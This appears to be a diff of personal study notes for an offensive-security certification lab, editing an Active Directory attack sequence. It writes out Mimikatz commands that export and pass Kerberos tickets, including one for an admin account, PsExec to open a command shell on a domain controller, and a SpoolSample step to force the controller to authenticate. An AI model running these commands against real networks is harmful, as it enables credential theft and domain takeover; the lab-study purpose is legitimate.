thamyekh/OSEP-Code-Snippets/osep_notes.md

 ...
 Client Name  (01) : admin ; @ PROD.CORP1.COM
 ...
-# note: sometimes you won't get the ticket, you need to be quick or use the right browser
+# note: sometimes you won't get the ticket
-Invoke-Mimikatz -Command 'privilege::debug "sekurlsa::tickets /export"'
+- you need to be quick or use the right browser to visit http://appsrv01 to cache TGT in memory Invoke-Mimikatz -Command 'privilege::debug "sekurlsa::tickets /export"'
 # ls to see all the tickets and find the one that matches your target
 Invoke-Mimikatz  -Command '"kerberos::ptt [0;10a3f5]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi"'
 C:\Tools\SysinternalsSuite\PsExec.exe /accepteula \\cdc01 cmd
 ```
+### semi-auto approach
+force dc to connect to application service using SpoolSample.exe
 ```
-# semi-auto approach: force dc to connect to application service using SpoolSample.exe
 # check if print spooler service is running and accessible
 dir \\cdc01\pipe\spoolss